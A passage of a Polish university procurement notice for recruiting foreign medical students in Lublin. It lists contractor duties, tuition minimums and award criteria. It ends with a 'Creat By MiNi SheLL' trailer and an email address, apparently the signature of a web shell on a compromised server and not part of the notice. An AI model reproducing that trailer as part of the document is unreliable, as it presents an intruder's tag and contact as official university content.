Liczba osób ze strony Zamawiającego, obecnych przy egzaminach będzie każdorazowo ustalana wspólnie między Zamawiającym a Wykonawcą
f)	zapewnienia przynajmniej jednej osoby posiadającej minimum 3-letnie doświadczenie w prowadzeniu rekrutacji studentów
g)	podjęcia wszelkich niezbędnych działań w zakresie reklamy i promocji programu Arabskiego na Uniwersytecie Medycznym w Lublinie celem zabezpieczenia umówionej rekrutacji studentów zagranicznych
h)	zapewnienia pomocy studentom zagranicznym w kontaktowaniu się z Zamawiającym, a także w organizacji przylotu do Polski
i)	zapewnienia minimum jednej, pełnoletniej osoby (biegle władającej językiem polskim i angielskim) tzw. Asystenta studenta reprezentującego Wykonawcę przez wszystkie lata kształcenia każdego zrekrutowanego przez Wykonawcę studenta przewidziane tokiem studiów w celu pomocy studentom w organizacji spraw socjalno bytowych w Polsce (tj. transport z lotniska, pomoc w zakwaterowaniu, pomoc w załatwianiu spraw zdrowotnych, urzędowych na przykład: poczta, szpital, policja,)
j)	zapewnienia zrekrutowanym studentom organizację orientation week, polegającego na zapoznaniu ich z rozkładem budynków Uniwersytetu, w których odbywają się zajęcia oraz innymi podstawowymi kwestiami związanymi z funkcjonowaniem w Polsce przed rozpoczęciem roku akademickiego
k)	przedstawienia dostarczonych przez Zamawiającego informacji dotyczących kryteriów przyjęć na studia kandydatom, ich rodzicom i stronom zainteresowanym medycznym programem proponowanym przez Zamawiającego, jak również informacji dotyczących warunków zakwaterowania w Lublinie, programów studiów, obowiązujących podręczników, formularzy, podań etc.
l)	zapoznania studentów z podstawowymi obowiązkami, wynikającymi z obowiązujących na Uniwersytecie przepisów
m)	pomoc studentom w poszukiwaniu mieszkań.

Wykonawca usługi zobowiązuje się do rekrutacji studentów będących w stanie uiszczać opłatę za czesne w kwocie minimum 15 750,00 USD za pierwszy rok akademicki powiększonej o prowizję należną Rekruterowi, oraz opłatę wpisowego w kwocie 500 USD (nie podlegającą obliczaniu prowizji) a za lata akademickie II - IV czesne w wysokości nie mniejszej niż 15 750,00 USD (nie podlegającej obliczaniu prowizji) oraz V - VI czesne w wysokości nie mniejszej niż 18 000,00 USD (nie podlegającej obliczaniu prowizji).
Wspólny Słownik Zamówień (CPV):   
79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania
79600000-0 - Usługi rekrutacyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 79.60.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa rekrutacji studentów z obszaru państw europejskich na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 2 jest usługa polegająca na rekrutacji studentów z obszaru państw europejskich na sześcioletni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie (zwanym dalej Uniwersytetem) według sześcioletniego programu obowiązującego w Unii Europejskiej.
Zamawiający wymaga od Wykonawcy usługi zrekrutowania minimum 20 i maksimum 40 studentów na rok akademicki 2016/2017. Rok akademicki obejmuje okres od 1 października do 30 września.
Wykonawca usługi zobowiązuje się do:
a)	zapoznania kandydatów z ofertą kształcenia i   podstawowymi obowiązkami studentów  o których mowa w §11 oraz  warunkami ponoszenia opłat i dokonywania ich podwyższenia o których mowa  w §15 ÷ §22 warunków umowy w zakresie zadania nr 2
b)	dokonywania rzetelnej weryfikacji uwierzytelnionej dokumentacji kandydatów przedłożonej w języku angielskim lub polskim
c)	dostarczenie Uniwersytetowi przy rekomendowaniu kandydatów na studia pełnego kompletu dokumentów wszystkich kandydatów najpóźniej do dnia 30 sierpnia 2016 r.
d)	podjęcia wszelkich niezbędnych działań w zakresie reklamy i promocji programu Europejskiego na Uniwersytecie Medycznym w Lublinie celem zabezpieczenia umówionej rekrutacji studentów zagranicznych
e)	zapewnienia pomocy studentom zagranicznym w kontaktowaniu się z Zamawiającym, a także w organizacji przylotu do Polski
f)	zapewnienia minimum jednej, pełnoletniej osoby (biegle władającej językiem polskim, angielskim) tzw. Asystenta studenta reprezentującego Wykonawcę przez wszystkie lata kształcenia każdego zrekrutowanego przez Wykonawcę studenta przewidziane tokiem studiów w celu pomocy studentom w organizacji spraw socjalno bytowych w Polsce (tj. transport z lotniska, pomoc w zakwaterowaniu, pomoc w załatwianiu spraw zdrowotnych, urzędowych na przykład: poczta, szpital, policja,)
g)	zapewnienie zrekrutowanym studentom organizację orientation week, polegającego na zapoznaniu ich z rozkładem budynków Uniwersytetu, w których odbywają się zajęcia oraz innymi podstawowymi kwestiami związanymi z funkcjonowaniem w Polsce przed rozpoczęciem roku akademickiego
h)	przedstawienie dostarczonych przez Zamawiającego informacji dotyczących kryteriów przyjęć na studia kandydatom, ich rodzicom i stronom zainteresowanym medycznym programem proponowanym przez Zamawiającego, jak również informacji dotyczących warunków zakwaterowania w Lublinie, programów studiów, obowiązujących podręczników, formularzy, podań etc.
i)	zapoznanie studentów z podstawowymi obowiązkami, wynikających z obowiązujących na Uniwersytecie przepisów .
j)	pokrycie kosztów egzaminu wstępnego  o ile odbywał się będzie poza siedzibą  Zamawiającego
k)	pomoc studentom w poszukiwaniu mieszkań
l)	zapewnienia przynajmniej jednej osoby posiadającej minimum 3-letnie doświadczenie w prowadzeniu rekrutacji studentów


Wykonawca usługi zobowiązuje się do rekrutacji studentów będących w stanie uiszczać opłatę za czesne w kwocie minimum 9 900,00 EUR za pierwszy rok akademicki powiększonej o prowizję należną Rekruterowi, oraz opłatę wpisowego w kwocie 500 EUR (nie podlegającą obliczaniu prowizji) a za lata akademickie II - III czesne w wysokości nie mniejszej niż 9 900,00 EUR (nie podlegającej obliczaniu prowizji) oraz IV - VI czesne w wysokości nie mniejszej niż 11 900,00 EUR (nie podlegającej obliczaniu prowizji).
Wspólny Słownik Zamówień (CPV):  
79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania
79600000-0 - Usługi rekrutacyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 79.60.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com